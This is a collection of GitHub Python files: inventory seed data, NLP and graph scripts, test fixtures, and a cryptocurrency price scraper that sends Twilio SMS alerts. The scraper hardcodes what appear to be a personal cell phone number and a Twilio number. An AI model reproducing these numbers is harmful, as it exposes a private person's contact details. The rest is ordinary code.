Item(name=\"玉米筍(4支)\", price=20, unit=\"籃\", tag_id=1),\n Item(name=\"娃娃菜\", price=20, unit=\"把\", tag_id=1),\n Item(name=\"高麗菜\", price=30, unit=\"籃\", tag_id=1),\n Item(name=\"手工黑輪\", price=10, unit=\"個\", tag_id=2),\n Item(name=\"米血\", price=10, unit=\"個\", tag_id=2),\n Item(name=\"貢丸\", price=10, unit=\"顆\", tag_id=2),\n Item(name=\"龍蝦沙拉丸\", price=10, unit=\"顆\", tag_id=2),\n Item(name=\"魚包蛋\", price=15, unit=\"顆\", tag_id=2),\n Item(name=\"北海貝\", price=15, unit=\"個\", tag_id=2),\n Item(name=\"魚豆腐(2個)\", price=15, unit=\"籃\", tag_id=2),\n Item(name=\"百頁豆腐\", price=15, unit=\"個\", tag_id=2),\n Item(name=\"油豆腐\", price=20, unit=\"個\", tag_id=2),\n Item(name=\"鳥蛋\", price=20, unit=\"顆\", tag_id=2),\n Item(name=\"手工高麗菜捲\", price=20, unit=\"捲\", tag_id=2),\n Item(name=\"豬肉片\", price=20, unit=\"串\", tag_id=2),\n Item(name=\"牛肉片\", price=25, unit=\"串\", tag_id=2),\n Item(name=\"石斑魚條\", price=25, unit=\"串\", tag_id=2),\n Item(name=\"王子麵\", price=15, unit=\"包\", tag_id=3),\n Item(name=\"意麵\", price=15, unit=\"包\", tag_id=3),\n Item(name=\"烏龍麵\", price=20, unit=\"包\", tag_id=3),\n Item(name=\"荷包蛋\", price=20, unit=\"個\", tag_id=3),\n Item(name=\"蔥蛋\", price=25, unit=\"個\", tag_id=3),\n Item(name=\"可口可樂\", price=25, unit=\"瓶\", tag_id=4),\n Item(name=\"雪碧\", price=25, unit=\"瓶\", tag_id=4),\n Item(name=\"蘋果汁\", price=25, unit=\"罐\", tag_id=4),\n Item(name=\"檸檬風味茶\", price=25, unit=\"罐\", tag_id=4)\n]\nfake_tags = [Tag(name=\"季節時蔬\"), Tag(name=\"關東煮\"),Tag(name=\"主食類/其他\"),Tag(name=\"飲品\")]\n\nlineitem1 = [\n LineItem(amount=3, item_id=1, name=\"青椒\", price=20, unit=\"個\"),\n LineItem(amount=1, item_id=22, name=\"王子麵\", price=20, unit=\"包\"),\n]\nlineitem2 = [\n LineItem(amount=2, item_id=1, name=\"青椒\", price=20, unit=\"個\"),\n LineItem(amount=4, item_id=27, name=\"可口可樂\", price=30, unit=\"瓶\"),\n]\n\norder1 = Order(username=\"cloudy\", lineitems=lineitem1)\norder2 = Order(username=\"sunny\", lineitems=lineitem2)\n\norder1.lineitems = lineitem1\norder2.lineitems = lineitem2\n\nfake_orders = [order1, order2]\n\nwith app.app_context():\n for item in fake_items:\n db.session.add(item)\n\n for tag in fake_tags:\n db.session.add(tag)\n\n for order in fake_orders:\n db.session.add(order)\n\n for lineitem in lineitem1 + lineitem2:\n db.session.add(lineitem)\n\n db.session.commit()\n","repo_name":"cloudy9982/Hot-Pot-Ingredients-Inventory-Management-System","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26455679717","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 8 17:09 2019\n\n@author: sanaz\nThis Modul searches for the frames with semantic type ['Positive_judgment', 'End_of_scale', 'Negative', 'Negative_judgment'] in FrameNet. \n\"\"\"\nfrom nltk.corpus import framenet as fn\nimport json\n\n# input\nSEM_TYPES = './senti_semantic_types.txt'\nOUTPUT = './frames_by_semtypes.json'\n\nwith open(SEM_TYPES,'r') as f:\n sem_types = [line.strip() for line in f.readlines()]\n# all frame in FrameNet \nframes = fn.frames()\n\nframe_dict = {sem_type:[] for sem_type in sem_types}\n# iterate over frames in FrameNet \nfor frame in frames:\n\t# iterate over semantic type in frame with semantic type \n for sem_type in frame.semTypes:\n\t\t# if this semantic type in frame.sem_types \n if sem_type.name in sem_types:\n\t # print frame and frame ID with semantic type from input into frame_dict \n # print(frame.name, frame.ID)\n frame_dict[sem_type.name].append({'frame_name': frame.name, 'frame_id': frame.ID})\n# write to the OUTPUT\nwith open(OUTPUT, 'w') as f:\n json.dump(frame_dict, f)\n \n#print(frame_dict)\n\n","repo_name":"NadiaWahida/framenet_extension","sub_path":"FrameNetAnalyse/Code/get_frames_by_semType.py","file_name":"get_frames_by_semType.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7511419101","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # FeTS Challenge\n# \n# Contributing Authors (alphabetical order):\n# - Brandon Edwards (Intel)\n# - Patrick Foley (Intel)\n# - Micah Sheller (Intel)\n\nfrom fets_challenge import model_outputs_to_disc\nfrom pathlib import Path\nimport os\nfrom sys import path\nfrom fets_challenge.gandlf_csv_adapter import construct_fedsim_csv, extract_csv_partitions\n\ndevice='cpu'\n\n# infer participant home folder\nhome = str(Path.home())\n\n# you will need to specify the correct experiment folder and the parent directory for\n# the data you want to run inference over\ncheckpoint_folder='experiment_1'\n#data_path = \ndata_path = '/raid/datasets/FeTS22/MICCAI_FeTS2022_ValidationData'\n\n# you can keep these the same if you wish\nbest_model_path = os.path.join(home, '.local/workspace/checkpoint', checkpoint_folder, 'best_model.pkl')\noutputs_path = os.path.join(home, '.local/workspace/checkpoint', checkpoint_folder, 'model_outputs')\n\nvalidation_csv_filename='validation.csv'\n\n\n# Using this best model, we can now produce NIfTI files for model outputs \n# using a provided data directory\n\nmodel_outputs_to_disc(data_path=data_path, \n validation_csv=validation_csv_filename,\n output_path=outputs_path, \n native_model_path=best_model_path,\n outputtag='',\n device=device)\n","repo_name":"FeTS-AI/Challenge","sub_path":"Task_1/generate_predictions.py","file_name":"generate_predictions.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"2"} +{"seq_id":"2281887027","text":"\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen, Request\nfrom datetime import datetime\nimport keys2\n\nfrom twilio.rest import Client\n\nclient=Client(keys2.accountSID, keys2.authToken)\n\nTwilioNumber='+18585445760'\nmyCellPhone='+18327767907'\n\n\nurl = 'https://crypto.com/price'\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\nreq= Request(url, headers=headers)\nwebpage=urlopen(req).read()\nsoup=BeautifulSoup(webpage,'html.parser')\n\nrank=0\nrows=soup.findAll('tr')\nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\")\nprint(\"TOP 5 CRYPTOCURRENCIES AS OF \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\") )\nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\")\nprint()\nfor x in rows[1:6]:\n cell=x.findAll('td')\n p=x.findAll(\"p\")\n div=cell[3].findAll('div')\n rank+=1\n curreny=p[0].text\n symbol=cell[2].text\n symbol=symbol.replace(curreny,'')\n if symbol=='':\n symbol='None'\n price=div[0].text\n change=cell[4].text\n price=price.replace(change,'')\n print(\"==========================\")\n print(\"==========================\")\n print(f' Rank: {rank}')\n print(f' Name: {curreny} ')\n print(f' Symbol: {symbol} ')\n print(f' Current Price: {price}')\n print(f' 24hr %Change: {change}')\n print(\"==========================\")\n print(\"==========================\")\n print()\n input(\"Press enter for the next coin\")\n \n if symbol=='BTC' and float(price.replace('$','').replace(',',''))<40000:\n textmessage=client.messages.create(to=myCellPhone, from_=TwilioNumber, body='The Price of Bitcoin has fallen below $40,000. The current price of Bitcoin is '+ price)\n #print(textmessage.status)\n if symbol=='ETH' and float(price.replace('$','').replace(',',''))<3000:\n textmessage=client.messages.create(to=myCellPhone, from_=TwilioNumber, body='The Price of Ethereum has fallen below $3,000. The current price of Ethereum is '+ price)\n #print(textmessage.status)\n ","repo_name":"ALEXETZEL/webscrapingAP","sub_path":"crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28775395657","text":"import os\nimport subprocess\n\nclass KataController(object):\n # def __init__(self, language, test_file):\n\n @staticmethod\n def createCode():\n args = os.environ[\"EDITOR\"].split()\n import tempfile\n tempfile = tempfile.NamedTemporaryFile(suffix=\".tmp\")\n args.append(tempfile.name)\n subprocess.call(args)\n code = open(tempfile.name, 'r').read()\n tempfile.close\n os.unlink(tempfile.name)\n return code\n\n @staticmethod\n def interactive():\n shell = 'groovysh'\n subprocess.call(args)\n # def prepare(self):\n # virtualenv, pip, whatever","repo_name":"maxlinc/behave-relish","sub_path":"omni/katacontroller.py","file_name":"katacontroller.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29485889223","text":"import pandas as pd\nfrom stemmer import stem\nimport re\n\n# Pattern to clean apostrophes\nquotePattern = re.compile(\"[']\")\n# Pattern to remove special characters\nspecCharsPattern = re.compile(\"[^A-Za-z0-9' ]\")\n\n# Stop word dictionary\nstop_words = {'he': 0, 'at': 0, \"wont\": 0, 'below': 0, \"its\": 0, 'under': 0,\n'who': 0, 'her': 0, \"wasnt\": 0, 'have': 0, 'while': 0, 'how': 0, 'both': 0,\n\"arent\": 0, 'and': 0, 'yours': 0, 'i': 0, 'in': 0, 'own': 0, \"shes\": 0,\n'now': 0, \"neednt\": 0, 'few': 0, 'them': 0, 'hasn': 0, \"thatll\": 0,\n'before': 0, 'do': 0, 'ourselves': 0, 's': 0, \"youll\": 0, 'himself': 0,\n'same': 0, 'ain': 0, 'out': 0, 'we': 0, \"hasnt\": 0, 'what': 0, 'until': 0,\n'herself': 0, 'needn': 0, \"shant\": 0, 'after': 0, \"isnt\": 0, 'just': 0,\n'down': 0, 'doesn': 0, 'hadn': 0, 've': 0, 'more': 0, 'were': 0, 'through': 0,\n'an': 0, 'can': 0, 'a': 0, \"couldnt\": 0, 'haven': 0, 'each': 0, 'which': 0,\n'by': 0, 'wouldn': 0, 'over': 0, 'most': 0, \"mightnt\": 0, 'be': 0, 'off': 0,\n'your': 0, \"mustnt\": 0, 'too': 0, 't': 0, 'hers': 0, 'its': 0, 'd': 0,\n'you': 0, 'or': 0, 'is': 0, 'been': 0, 'all': 0, 'for': 0, 'if': 0,\n'yourself': 0, 'had': 0, 'as': 0, 'weren': 0, 'their': 0, 'this': 0,\n'with': 0, 'other': 0, 'has': 0, 'not': 0, \"shouldve\": 0, \"shouldnt\": 0,\n'are': 0, 'don': 0, 'shan': 0, 'doing': 0, 'm': 0, 'they': 0, \"youd\": 0,\n'having': 0, 'ours': 0, 'wasn': 0, 'did': 0, 'here': 0, \"hadnt\": 0, 're': 0,\n'on': 0, 'very': 0, 'that': 0, 'above': 0, \"werent\": 0, \"youve\": 0,\n'mustn': 0, 'will': 0, 'should': 0, 'couldn': 0, 'to': 0, 'there': 0, 'so': 0,\n'itself': 0, 'our': 0, 'me': 0, \"doesnt\": 0, 'ma': 0, 'such': 0, 'further': 0,\n'only': 0, 'the': 0, 'between': 0, 'y': 0, 'some': 0, 'him': 0, 'those': 0,\n'won': 0, 'mightn': 0, 'nor': 0, 'being': 0, 'was': 0, 'themselves': 0,\n'any': 0, \"didnt\": 0, 'my': 0, \"wouldnt\": 0, 'these': 0, 'she': 0, 'into': 0,\n'am': 0, \"youre\": 0, 'where': 0, 'isn': 0, 'once': 0, 'it': 0, 'didn': 0,\n'during': 0, 'about': 0, 'again': 0, 'aren': 0, 'yourselves': 0, 'theirs': 0,\n'll': 0, \"havent\": 0, 'against': 0, 'then': 0, 'why': 0, 'o': 0, 'but': 0,\n\"dont\": 0, 'shouldn': 0, 'up': 0, 'no': 0, 'because': 0, 'than': 0, 'does': 0,\n'his': 0, 'when': 0, 'of': 0, 'whom': 0, 'from': 0, 'myself': 0}\n\n\ndef clean(text):\n if not pd.isnull(text):\n text = re.sub(quotePattern, \"\", text)\n text = re.sub(specCharsPattern, \" \", text)\n tokens = text.lower().split()\n filtered_text = \"\"\n for w in tokens:\n if w not in stop_words:\n filtered_text += stem(w) + \"|\"\n return filtered_text[:-1]\n else:\n return None\n\n\ndata = pd.read_csv('news_scrap_final.csv', header=0)\nclean_data = pd.DataFrame(columns=data.columns.values)\n\nfor i, row in data.iterrows():\n heading = clean(row['HEADING'])\n body = clean(row['BODY'])\n if heading and body and row['CATEGORY'] and row['Real/Fake']:\n clean_data = clean_data.append({'HEADING': heading, 'BODY': body, 'CATEGORY': row['CATEGORY'], 'Real/Fake': row['Real/Fake']}, ignore_index=True)\n\nclean_data.dropna(how='any')\nclean_data.to_csv('news_data_final.csv', encoding='utf-8', index=False)\n","repo_name":"Pi-Rasp/Fake-News-Detection","sub_path":"Preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"14130505727","text":"import asyncio\nimport datetime\n\nimport databroker\nimport pytest\nfrom bluesky.callbacks import best_effort\nfrom bluesky.run_engine import RunEngine\nfrom databroker import Broker\nfrom ophyd.utils import make_dir_tree\n\nfrom sirepo_bluesky.madx_handler import MADXFileHandler\nfrom sirepo_bluesky.shadow_handler import ShadowFileHandler\nfrom sirepo_bluesky.sirepo_bluesky import SirepoBluesky\nfrom sirepo_bluesky.srw_handler import SRWFileHandler\n\n\n@pytest.fixture(scope=\"function\")\ndef db():\n \"\"\"Return a data broker\"\"\"\n # MongoDB backend:\n db = Broker.named(\"local\") # mongodb backend\n try:\n databroker.assets.utils.install_sentinels(db.reg.config, version=1)\n except Exception:\n pass\n\n db.reg.register_handler(\"srw\", SRWFileHandler, overwrite=True)\n db.reg.register_handler(\"shadow\", ShadowFileHandler, overwrite=True)\n db.reg.register_handler(\"SIREPO_FLYER\", SRWFileHandler, overwrite=True)\n db.reg.register_handler(\"madx\", MADXFileHandler, overwrite=True)\n\n return db\n\n\n@pytest.fixture(scope=\"function\")\ndef RE(db):\n loop = asyncio.new_event_loop()\n loop.set_debug(True)\n RE = RunEngine({}, loop=loop)\n RE.subscribe(db.insert)\n\n bec = best_effort.BestEffortCallback()\n RE.subscribe(bec)\n\n return RE\n\n\n@pytest.fixture(scope=\"function\")\ndef RE_no_plot(db):\n loop = asyncio.new_event_loop()\n loop.set_debug(True)\n RE = RunEngine({}, loop=loop)\n RE.subscribe(db.insert)\n\n bec = best_effort.BestEffortCallback()\n bec.disable_plots()\n RE.subscribe(bec)\n\n return RE\n\n\n@pytest.fixture(scope=\"function\")\ndef make_dirs():\n root_dir = \"/tmp/sirepo-bluesky-data\"\n _ = make_dir_tree(datetime.datetime.now().year, base_path=root_dir)\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_empty_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"emptysim\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_youngs_double_slit_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000000\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_basic_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000001\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_tes_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000002\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_ari_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000003\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_chx_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"HXV1JQ5c\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef shadow_basic_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"shadow\", \"00000001\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef shadow_tes_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"shadow\", \"00000002\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef madx_resr_storage_ring_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"madx\", \"00000000\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef madx_bl1_compton_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"madx\", \"00000001\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef madx_bl2_triplet_tdc_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"madx\", \"00000002\")\n return connection\n","repo_name":"NSLS-II/sirepo-bluesky","sub_path":"sirepo_bluesky/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"72181380205","text":"'''\nTask. Given an undirected graph and two distinct vertices 𝑢 and 𝑣, check if there is a path between 𝑢 and 𝑣.\nInput Format. An undirected graph with 𝑛 vertices and 𝑚 edges. The next line contains two vertices 𝑢\nand 𝑣 of the graph.\nConstraints. 2 ≤ 𝑛 ≤ 103\n; 1 ≤ 𝑚 ≤ 103\n; 1 ≤ 𝑢, 𝑣 ≤ 𝑛; 𝑢 ̸= 𝑣.\nOutput Format. Output 1 if there is a path between 𝑢 and 𝑣 and 0 otherwise.\n'''\n\ndef explore(adjList,a,visited):\n visited[a] = True\n for ele in adjList[a]:\n if not visited[ele]:\n explore(adjList,ele,visited)\n\ndef reach(adjList, x, y):\n visited = [False]*(len(adjList))\n explore(adjList,x,visited)\n if visited[y] == True:\n return 1\n else:\n return 0\n\n\nif __name__ == '__main__':\n n,m = list(map(int,input().split()))\n edgeList = []\n for i in range(m):\n a,b = map(int,input().split())\n edgeList.append([a,b])\n x,y = map(int,input().split())\n adjList = [[] for _ in range(n)]\n for l in edgeList:\n adjList[l[0]-1].append(l[1]-1)\n adjList[l[1]-1].append(l[0]-1)\n print(reach(adjList,x-1,y-1))\n","repo_name":"yashwanthguguloth24/Algorithms-on-Graphs","sub_path":"Week1-Decomposition of Graphs/reachability.py","file_name":"reachability.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29639187027","text":"from backpack import solveKnapsackFile, Solver\nimport unittest\nimport time\nimport matplotlib.pyplot as plt\n\nclass BackpackTest(unittest.TestCase):\n\n def testMethodsOnFile(self, problems_filename=\"problems_size10.txt\", solutions_filename=\"problems_size10_solutions.txt\"):\n \n # Locate solutions file\n try:\n f = open(solutions_filename)\n except FileNotFoundError:\n f = open('problems/' + solutions_filename)\n \n # Load expected solutions\n expected_solution_string = next(f)\n expected_solution = eval(expected_solution_string)\n f.close()\n\n # Test each algorithm that the solver currently supports\n solver = Solver()\n solver.loadProblemFromFile(problems_filename)\n for method in solver.SOLVER_METHODS:\n print(f\"Testing {method}...\")\n self.assertEqual(solver.getSolutions(method), expected_solution, f\"\\n\\n\\n\\nThis failure occurred when testing {method}.\")\n print(f\"{method} test was successful.\")\n\n\ndef produce_plots():\n \n SIZES = [10, 15, 20]\n timings = dict() # maps file's approximate problem size to time to solve entire file\n\n for size in SIZES:\n\n print(f\"\\n\\nNow solving problems_size{size}.txt:\")\n\n # Record how long the file for this size takes\n start = time.perf_counter()\n solution = solveKnapsackFile(f\"problems_size{size}.txt\", verbosity=1)\n end = time.perf_counter()\n timings[size] = end - start\n\n print(\"Total time: %.3f sec\" % (end - start))\n print(\"Solutions:\")\n print(solution)\n\n # No need to plot just one datapoint\n if len(timings) == 1: \n continue\n \n # Plot all the datapoints so far; this way the user can kill the program once the graphs are taking too long to generate, but still see graphs on the way to that point\n plt.title(f\"Timings for Problem Sizes {', '.join([str(size) for size in timings])}\")\n plt.xlabel(\"Approximate Problem Size\")\n plt.ylabel(\"Running Time (sec)\")\n plt.xticks(ticks=list(timings.keys()))\n plt.plot(list(timings.keys()), list(timings.values()))\n plt.show()\n\n\ndef main(run_unit_tests=True, plot=False):\n \n # Print a demo solution\n demo_filename = \"problems_size15.txt\"\n print(f\"Solution for {demo_filename}:\")\n solution = solveKnapsackFile(\"problems_size15.txt\")\n print(solution)\n\n # Run tests and produce plots, if so desired\n if plot:\n produce_plots()\n if run_unit_tests:\n print(\"\\n----------------------------------------------------------------------\\nNow running unit tests on all knapsack implementations.\\n\")\n unittest.main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"esramish/Knapsack","sub_path":"test_knapsack.py","file_name":"test_knapsack.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"442804058","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\npd.options.display.max_columns = 999\r\nhomes = pd.read_excel('C:/Users/Administrator/Documents/Python/home_data.xlsx')\r\nprint(homes.head())\r\nprint(homes.corr())\r\n\r\n# 散点图\r\nhomes.plot.scatter(x='sqft_living', y='price')\r\nplt.show()\r\n\r\n# 面积直方图\r\nhomes.sqft_living.plot.kde()\r\nhomes.sqft_living.plot.hist(bins=100)\r\nplt.xticks(range(0, max(homes.sqft_living), 500), fontsize=8, rotation=90)\r\nplt.show()\r\n\r\n# 价格直方图\r\nhomes.price.plot.hist(bins=200)\r\nplt.xticks(range(0, max(homes.price), 100000), fontsize=8, rotation=90)\r\nplt.show()\r\n\r\n# 密度图\r\nhomes.sqft_living.plot.kde()\r\nplt.xticks(range(0, max(homes.sqft_living), 500), fontsize=8, rotation=90)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Morgenlefay/Pandas-VS-Excel","sub_path":"D11.py","file_name":"D11.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18862936829","text":"import sys\nimport pickle\nfrom tqdm import tqdm\nimport os.path as osp\nimport multiprocessing as mp\n\nimport numpy as np\nimport networkx as nx\n\nimport torch\nfrom torch.nn import CosineSimilarity\nfrom torch_geometric.utils import to_networkx\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics.pairwise import cosine_similarity, cosine_distances, euclidean_distances\n\ndef sample_anchor_nodes(data, num_anchor_nodes, sampling_method):\n \"\"\"\n Returns num_anchor_nodes amount of sampled anchor nodes based upon the sampling_method provided\n \"\"\"\n if sampling_method == 'stochastic':\n node_indices = np.arange(data.num_nodes)\n sampled_anchor_nodes = np.random.choice(node_indices, num_anchor_nodes)\n\n if sampling_method == 'pagerank':\n G = to_networkx(data)\n pagerank = nx.pagerank_scipy(G)\n sorted_pagerank = {k: v for k, v in sorted(pagerank.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_pagerank.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'betweenness_centrality':\n G = to_networkx(data)\n betweenness_centrality = nx.betweenness_centrality(G)\n sorted_betweenness_centrality = {k: v for k, v in sorted(betweenness_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_betweenness_centrality.keys())[-num_anchor_nodes:]#take last n because of ascending sort\n\n if sampling_method == 'degree_centrality':\n G = to_networkx(data)\n degree_centrality = nx.degree_centrality(G)\n sorted_degree_centrality = {k: v for k, v in sorted(degree_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_degree_centrality.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'eigenvector_centrality':\n G = to_networkx(data)\n eigenvector_centrality = nx.eigenvector_centrality_numpy(G)\n sorted_eigenvector_centrality = {k: v for k, v in sorted(eigenvector_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_eigenvector_centrality.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'closeness_centrality':\n G = to_networkx(data)\n closeness_centrality = nx.closeness_centrality(G)\n sorted_closeness_centrality = {k: v for k, v in sorted(closeness_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_closeness_centrality.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'clustering_coefficient':\n G = to_networkx(data)\n clustering_coefficient = nx.clustering(G)\n sorted_clustering_coefficient = {k: v for k, v in sorted(clustering_coefficient.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_clustering_coefficient.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n return sampled_anchor_nodes\n\ndef shortest_path_length(G, anchor_nodes, partition_length):\n \"\"\"\n Calculate shortest path distance to every sampled anchor node and normalize by 1/distance. No path = 0\n \"\"\"\n dists_dict = {}\n for node in partition_length:\n distances = []\n for anchor_node in anchor_nodes:\n try:\n distances.append(1/len(nx.shortest_path(G, source=node, target=anchor_node)))\n\n except nx.NetworkXNoPath:\n distances.append(0)\n dists_dict[node] = distances.copy()\n\n\n #dists_dict[node] = nx.single_source_shortest_path_length(G, node)\n return dists_dict\n\ndef merge_dicts(dicts):\n \"\"\"\n Helper function for parallel shortest path calculation. Merges dicts from jobs into one\n \"\"\"\n result = {}\n for dictionary in dicts:\n result.update(dictionary)\n return result\n\ndef all_pairs_shortest_path_length_parallel(G, anchor_nodes, num_workers):\n \"\"\"\n Distribute shortest path calculation jobs to async workers, merge dicts and return results\n \"\"\"\n try:\n nodes = list(G.nodes)\n pool = mp.Pool(processes=num_workers)\n jobs = [pool.apply_async(shortest_path_length,\n args=(G, anchor_nodes, nodes[int(len(nodes)/num_workers*i):int(len(nodes)/num_workers*(i+1))])) for i in range(num_workers)]\n output = []\n for job in tqdm(jobs):\n output.append(job.get())\n dists_dict = merge_dicts(output)\n pool.close()\n pool.join()\n return dists_dict\n \n except KeyboardInterrupt:\n print('terminating workers...')\n pool.terminate()\n pool.join()\n print('workers terminated!')\n sys.exit(1)\n\ndef get_geodesic_distance_vector(data, num_workers):\n \"\"\"\n Calculate normalized distance vector for all nodes in given graph G. Calculation is performed using networkx shortest path length and normalization is performed trough 1/distance.\n \"\"\"\n distance_embedding = []\n G = to_networkx(data)\n\n dist_dict = all_pairs_shortest_path_length_parallel(G, data.anchor_nodes, num_workers)\n\n distance_embedding = torch.as_tensor(list(dist_dict.values()))\n return distance_embedding\n\n\ndef concat_into_features(embedding_matrix, data):\n \"\"\"\n Merge features and embedding matrix, returns combined feature matrix\n \"\"\"\n embedding_tensor = torch.as_tensor(embedding_matrix)\n combined = torch.cat((data.x, embedding_tensor), 1) #concatenate with X along dimension 1\n return combined\n\ndef attach_distance_embedding(data, dataset, num_anchor_nodes, sampling_method, distance_function, num_workers):\n \"\"\"\n Sample anchor nodes based on sampling method, returns GraphPOPE embeddings concatenated with feature matrix X\n \"\"\"\n print('sampling anchor nodes...')\n data.anchor_nodes = sample_anchor_nodes(data=data, num_anchor_nodes=num_anchor_nodes, sampling_method=sampling_method)\n print('deriving shortest paths to anchor nodes...')\n embedding_matrix = get_geodesic_distance_vector(data=data, num_workers=num_workers)\n extended_features = concat_into_features(embedding_matrix=embedding_matrix, data=data)\n print('feature matrix is blessed by the POPE!')\n return extended_features\n\ndef attach_node2vec(data, dataset, num_anchor_nodes, sampling_method, distance_function, num_workers):\n \"\"\"\n Load cached node2vec embedding of the given graph, generates embedding space GraphPOPE embeddings which are subsequently concatenated with the feature matrix X and returned\n \"\"\"\n scaler = MinMaxScaler()\n print('sampling anchor nodes...')\n loading_path = osp.join(osp.dirname(osp.realpath(__file__)), 'data', f'{dataset}_node2vec.pt')\n node2vec_embeddings = torch.load(loading_path, map_location=\"cpu\").detach().numpy()\n\n dist_map = {\n 'distance': cosine_distances,\n 'similarity': cosine_similarity,\n 'euclidean': euclidean_distances,\n }\n\n cosine_function = dist_map[distance_function]\n if sampling_method == 'stochastic':\n anchor_nodes = sample_anchor_nodes(data, num_anchor_nodes, sampling_method='stochastic')\n anchor_embeddings = [node2vec_embeddings[anchor_node] for anchor_node in anchor_nodes]\n else:\n kmeans = KMeans(n_clusters=num_anchor_nodes).fit(node2vec_embeddings)\n anchor_embeddings = kmeans.cluster_centers_\n print('K means cluster anchor nodes derived!')\n \n\n embedding_out = cosine_function(node2vec_embeddings, anchor_embeddings)\n scaler.fit(embedding_out)\n scaled_pope = scaler.transform(embedding_out)\n extended_features = concat_into_features(embedding_matrix=scaled_pope, data=data)\n\n print('feature matrix is blessed by the POPE')\n return extended_features\n\ndef Graphpope(data, dataset: str, embedding_space: str, sampling_method: str, num_anchor_nodes: int, distance_function=None, num_workers=4):\n \"\"\"\n Derive GraphPOPE embeddings for the provided data object.\n\n dataset: {'flickr', 'pubmed'}, required for cached nodevec embeddings of the graph.\n embedding_space: {'node2vec', 'geodesic'}, required to determine in which space anchor node distance is derived, geodesic distance or embedding space distance.\n sampling_method: {'stochastic', 'kmeans', 'closeness_centrality', 'degree_centrality', 'eigenvector_centrality', 'pagerank', 'clustering_coefficient'}, used to determine stochastic or biased 